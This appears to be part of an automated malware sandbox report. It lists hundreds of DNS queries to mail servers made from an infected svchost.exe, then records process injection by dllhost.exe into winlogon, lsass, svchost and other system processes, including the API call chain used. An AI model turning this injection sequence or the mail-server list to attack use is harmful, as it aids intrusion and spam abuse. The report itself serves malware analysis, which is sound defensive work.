                      Source: C:\Windows\System32\svchost.exeDomain query: mail.absamail.co.za
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.uniquedestinationsllc.com
                      Source: C:\Windows\System32\svchost.exeDomain query: morningnotes.com
                      Source: C:\Windows\System32\svchost.exeDomain query: zephyr.dti.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: beaumarisbooks.com.au
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.hot.ee
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ghuitf.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.bbox.fr
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.netregistry.net
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.hereiam.plus.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.secureserver.net
                      Source: C:\Windows\System32\svchost.exeDomain query: alt4.aspmx.l.google.com
                      Source: C:\Windows\System32\svchost.exeDomain query: alc.io
                      Source: C:\Windows\System32\svchost.exeDomain query: cometa21.it
                      Source: C:\Windows\System32\svchost.exeDomain query: eddwebs.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.cogeco.ca
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.iprimus.com.au
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.strath.ac.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.virginmedia.com
                      Source: C:\Windows\System32\svchost.exeDomain query: peterboroughcab-org-uk.mail.protection.outlook.com
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.acicapital.com
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.grandwayne.com
                      Source: C:\Windows\System32\svchost.exeDomain query: teletu.it
                      Source: C:\Windows\System32\svchost.exeDomain query: tinyworld.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.centrum.sk
                      Source: C:\Windows\System32\svchost.exeDomain query: out.caistergolf.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.skynet.be
                      Source: C:\Windows\System32\svchost.exeDomain query: nrl.pl
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.kabsi.at
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.optimum.net
                      Source: C:\Windows\System32\svchost.exeDomain query: out.aumentarpenis.net
                      Source: C:\Windows\System32\svchost.exeDomain query: cilm.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.sohns-ruit.de
                      Source: C:\Windows\System32\svchost.exeDomain query: emf.eei.uni-erlangen.de
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.websitebod.com
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.agrotipp.hu
                      Source: C:\Windows\System32\svchost.exeDomain query: mstevens.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.rockfiend.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.sccoast.net
                      Source: C:\Windows\System32\svchost.exeDomain query: tiscali.cz
                      Source: C:\Windows\System32\svchost.exeDomain query: tluh.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.ranuccy.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.helanta.sh
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.clubinternet.fr
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.hyacinthhouse.se
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.giochi0.it
                      Source: C:\Windows\System32\svchost.exeDomain query: aspmx4.googlemail.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.dynamicpayoff.com
                      Source: C:\Windows\System32\svchost.exeDomain query: i-dear2.de
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.servicioscorporativos.mx
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.cardnet.co.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.elhassociates.com
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.hexatech.com.my
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.frontier.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.gelsennet.de
                      Source: C:\Windows\System32\svchost.exeDomain query: muum.com.tr
                      Source: C:\Windows\System32\svchost.exeDomain query: chrislittell.com
                      Source: C:\Windows\System32\svchost.exeDomain query: augustakom.net
                      Source: C:\Windows\System32\svchost.exeDomain query: vera.com.uy
                      Source: C:\Windows\System32\svchost.exeDomain query: out.lollygaggeru.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.convertor-3gp.com
                      Source: C:\Windows\System32\svchost.exeDomain query: pec.it
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.sps-co.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.paris-ag.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.xtremexcavation.ca
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.capaci.de
                      Source: C:\Windows\System32\svchost.exeDomain query: docomo.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: out.mpost.co.nz
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.marley.de
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.southeastrec.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.frigus.eu
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.windstream.net
                      Source: C:\Windows\System32\svchost.exeDomain query: sunrise.ch
                      Source: C:\Windows\System32\svchost.exeDomain query: dvc.vn
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.marginalis.se
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.tmd-tunelmuhendisligi.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.bpmconsultants.in
                      Source: C:\Windows\System32\svchost.exeDomain query: out.clements1975.fslife.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: spektrum.ca
                      Source: C:\Windows\System32\svchost.exeDomain query: out.grupo-neo.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.aueb.gr
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.generic-isp.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.i.ua
                      Source: C:\Windows\System32\svchost.exeDomain query: out.theploughinn.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ms-scorpio.de
                      Source: C:\Windows\System32\svchost.exeDomain query: out.exois.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.tamkinhochberg.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.moenchs-waldhotel.de
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.apotecbay.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mx2c28.carrierzone.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.e-olympics.de
                      Source: C:\Windows\System32\svchost.exeDomain query: out.selfcateringinknysna.com
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.oita.jtuc-rengo.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: cloud15.spamtitan.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.techsolutionscanada.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.mairie-habsheim.de
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.ding.com
                      Source: C:\Windows\System32\svchost.exeDomain query: ceti.pl
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.rlmorgan.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.allianceinsurance.in
                      Source: C:\Windows\System32\svchost.exeDomain query: bhs-is.mail.protection.outlook.com
                      Source: C:\Windows\System32\svchost.exeDomain query: interia.eu
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.casadociclista.net.br
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.pflege.de
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.jcom.home.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: heidester.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.hughes.net
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.fivefigureweeks.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.gemicomp.com.ar
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.firstfriends.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.inwind.it
                      Source: C:\Windows\System32\svchost.exeDomain query: out.clayton.k.ga.us
                      Source: C:\Windows\System32\svchost.exeDomain query: out.web-schaaf.de
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.laser.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: vermesser.de
                      Source: C:\Windows\System32\svchost.exeDomain query: out.gammu.de
                      Source: C:\Windows\System32\svchost.exeDomain query: out.credibo.it
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.abcnetworkingu.pl
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.testroamright.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.pinnaclesettlements.com
                      Source: C:\Windows\System32\svchost.exeDomain query: lykal.com
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.mandres.de
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.lebcedars.com
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.bleisetzer.de
                      Source: C:\Windows\System32\svchost.exeDomain query: dzv-netz.de
                      Source: C:\Windows\System32\svchost.exeDomain query: out.arenaholidays.net
                      Source: C:\Windows\System32\svchost.exeDomain query: lfsvechta.de
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.gfgfgf.org
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.bindifencing.com.au
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ldbcargas.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: laudioikastola.net
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.etica.conc-bmw.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.netines.net
                      Source: C:\Windows\System32\svchost.exeDomain query: womenjapan.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp-01.tld.t-online.de
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.virgin.net
                      Source: C:\Windows\System32\svchost.exeDomain query: kefgames.net
                      Source: C:\Windows\System32\svchost.exeDomain query: digcom-ca.mail.protection.outlook.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.fkksol.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.csgs.com
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.saluscm.pl
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.grafikdev.com
                      Source: C:\Windows\System32\svchost.exeDomain query: autograf.pl
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.milaus.net
                      Source: C:\Windows\System32\svchost.exeDomain query: ms5.ncv.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.xplornet.ca
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.hif.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.theoxfordhotel.com.au
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.centurylink.net
                      Source: C:\Windows\System32\svchost.exeDomain query: aqua.daa.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: out.bysources.com
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.lcampino.cl
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ucr.ac.cr
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.fluid.demon.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.skidfamily.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.hotmy.fr
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.irvineproject.cn
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.desomniac.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mx0.uniserve.com
                      Source: C:\Windows\System32\svchost.exeDomain query: noos.fr
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.adephia.net
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.q.com
                      Source: C:\Windows\System32\svchost.exeDomain query: cefnogi.com
                      Source: C:\Windows\System32\svchost.exeDomain query: cssd.org
                      Source: C:\Windows\System32\svchost.exeDomain query: hofmann-geraberg.de
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ig.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.begames.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.atlanticbb.net
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.y4hoo.com
                      Source: C:\Windows\System32\svchost.exeDomain query: lengau.info.bw
                      Source: C:\Windows\System32\svchost.exeDomain query: mx3.ovh.net
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.barbassa.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.avis.cl
                      Source: C:\Windows\System32\svchost.exeDomain query: out.rostele.com
                      Source: C:\Windows\System32\svchost.exeDomain query: numeo.fr
                      Source: C:\Windows\System32\svchost.exeDomain query: oapv.cz
                      Source: C:\Windows\System32\svchost.exeDomain query: constelacionesmadrid.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ezweb.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.casscomm.com
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.shortlinesales.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.citromail.hu
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.framgangsrikaforetag.se
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.oldenglishchurch.org.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.wtqudu.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.tecdev.it
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.americanaugers.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: ozonekayak-com.mail.protection.outlook.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mx-1.dpoczta.pl
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.netzero.net
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.mchscares.org
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.tempcloud.info
                      Source: C:\Windows\System32\svchost.exeDomain query: grafmueller-schuhe.de
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.dolores.art.br
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.venter.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.netzero.com
                      Source: C:\Windows\System32\svchost.exeDomain query: viha.ca
                      Source: C:\Windows\System32\svchost.exeDomain query: out.therightweigh.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.optonline.net
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ivan-elkin.name
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.dk
                      Source: C:\Windows\System32\svchost.exeDomain query: out.vanwoerdekom.nl
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.eclplastics.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: out.multicopia360.com
                      Source: C:\Windows\System32\svchost.exeDomain query: telefonica.net
                      Source: C:\Windows\System32\svchost.exeDomain query: out.internet.club.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: d178078a.ess.barracudanetworks.com
                      Source: C:\Windows\System32\svchost.exeDomain query: in4.sk
                      Source: C:\Windows\System32\svchost.exeDomain query: airrivals.pl
                      Source: C:\Windows\System32\svchost.exeDomain query: gruesshaber.de
                      Source: C:\Windows\System32\svchost.exeDomain query: mx2.321.com
                      Source: C:\Windows\System32\svchost.exeDomain query: tvsnaples.org
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.polar-transport.cz
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.mjbelda.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.cotamicro.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: wss-docs.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.integrapost.cl
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.atlanticexpress.ca
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.futterplatzerl.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.hacked.de
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.limpec.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: out.shop-e-nfinite.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.hightelecom.com
                      Source: C:\Windows\System32\svchost.exeDomain query: i.softbank.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: btconnect.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.bresnan.net
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.mamasimon.de
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.freemail.hu
                      Source: C:\Windows\System32\svchost.exeDomain query: hooter.com
                      Source: C:\Windows\System32\svchost.exeDomain query: imsinc01.filter2.lastspam.com
                      Source: C:\Windows\System32\svchost.exeDomain query: softbank.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: virtualworkforcepro.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.sputtr.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.emarki.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.milenio.com
                      Source: C:\Windows\System32\svchost.exeDomain query: 94c8b50eb70aa4c8.com
                      Source: C:\Windows\System32\svchost.exeDomain query: cajememotors.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mx1.ovh.net
                      Source: C:\Windows\System32\svchost.exeDomain query: aspmx2.googlemail.com
                      Source: C:\Windows\System32\svchost.exeDomain query: bulkeley.navy.mil
                      Source: C:\Windows\System32\svchost.exeDomain query: dominy.f9.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.apollosouth.com
                      Source: C:\Windows\System32\svchost.exeDomain query: proxmea.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.uchisyakyo.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: out.rapeli.de
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.stein-druck.de
                      Source: C:\Windows\System32\svchost.exeDomain query: test789.fr
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.oaktreefinancial.ca
                      Source: C:\Windows\System32\svchost.exeDomain query: fsmail.net
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.sayclub.com
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.brpindustries.com.au
                      Source: C:\Windows\System32\svchost.exeDomain query: mx37.mb5p.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.univers-actu.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.pacnet.netau
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ziggo.nl
                      Source: C:\Windows\System32\svchost.exeDomain query: blakehurst.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.postmaster.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: loens.nl
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.forfas.ie
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.antasinsaat.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.muenzen-becker.de
                      Source: C:\Windows\System32\svchost.exeDomain query: laga.se
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.virgilio.it
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.scoilmhuirelongford.ie
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.market-wave.link
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.2cr-h.fr
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.nexgo.de
                      Source: C:\Windows\System32\svchost.exeDomain query: out.marin.club.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: hyacinthhouse.se
                      Source: C:\Windows\System32\svchost.exeDomain query: relay.upm.es
                      Source: C:\Windows\System32\svchost.exeDomain query: out.horizon-xl.de
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.elitter.net
                      Source: C:\Windows\System32\svchost.exeDomain query: aspmx.l.google.com
                      Source: C:\Windows\System32\dllhost.exeCode function: 7_2_000000014000242C CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,7_2_000000014000242C
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: 58952A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: ADFC2A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: DD592A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\dwm.exe EIP: CA32A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: E1072A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 8C1D2A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 97FD2A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 652E2A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: A27C2A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 87DA2A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: FB3C2A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5672A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: C1F32A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: E3BC2A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 38952A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 6E562A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 1FF72A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: F352A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 79572A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: A462A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 13112A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 8C582A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5F1D2A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5D9C2A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: AEC92A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: DC1B2A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 82532A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\spoolsv.exe EIP: A62A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 66EB2A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: FD9A2A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: CEDB2A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 42792A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B6F32A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8DCC2A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 73732A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F9DA2A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6CCC2A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 39D92A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FA392A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B7272A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 53B52A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E88A2A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 77B52A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5D342A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B5E12A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 59992A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 53C22A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 41D42A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: ADAD2A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3072A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4DB2A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3202A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C5282A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 76AA2A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F1B32A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F34B2A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DE4D2A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 74472A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A9D02A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AF8A2A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D8932A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5E932A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 43DC2A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 97E32A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DC872A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 698D2A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F9062A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 34C52A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 43542A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 84342A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 58922A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 39382A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9321BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A6AD2A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E2CD2A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 34C21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BB742A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11921BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6D21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15721BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2CF21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A421BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 30021BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10621BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15921BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C221BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8C21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E021BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9B21BFJump to behavior
